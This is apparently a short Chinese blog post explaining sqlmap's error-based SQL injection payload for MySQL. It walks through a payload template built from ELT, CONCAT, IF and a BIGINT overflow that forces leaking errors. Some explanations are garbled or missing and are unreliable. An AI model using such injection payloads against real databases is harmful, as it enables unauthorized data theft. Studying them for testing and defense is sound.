evil0x00 avatar

SQLMAP Part 1

evil0x00

Published: 13 Sept 2018 › Updated: 13 Sept 2018SQLMAP Part 1

SQLMAP Part 1

SQLMAP Part 1

放上大佬写的一个流程图

em .... 这篇文章 只写自己注入的一个方式 error-based injection

error-based也有叫做DOUBLE QUERY INJECTION,即双查询注入

Error-based tests - WHERE or HAVING clause

payload 如下:

AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))

其中

SELECT (ELT([RANDNUM]=[RANDNUM],1))

会返回NULL 如下:

SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x')

ELT() 函数使用方法如下: 这张图 能很好地解释了

CONCAT() 函数 如下:

mysql> SELECT CONCAT(My, S, QL);

-> MySQL

if() 函数用法如下:

if(expr1,expr2,expr3) 
 expr1 TRUE if()expr2;  expr3
if() 

至于为什么会报错 你只要在mysql中 执行如下命令 就可以就明白了:

select 3 * 8446744073709551610;

mysql> select 3 * 8446744073709551610;
ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'
mysql>

Leave SQLMAP Part 1 to:

Written by

Read more #cn posts


Best Posts From evil0x00

We have not curated any of evil0x00's posts yet. But you can encourage our curation team to review posts by visiting them regularly and by referring other readers. Because we give priority to frequently read content.

More Posts From evil0x00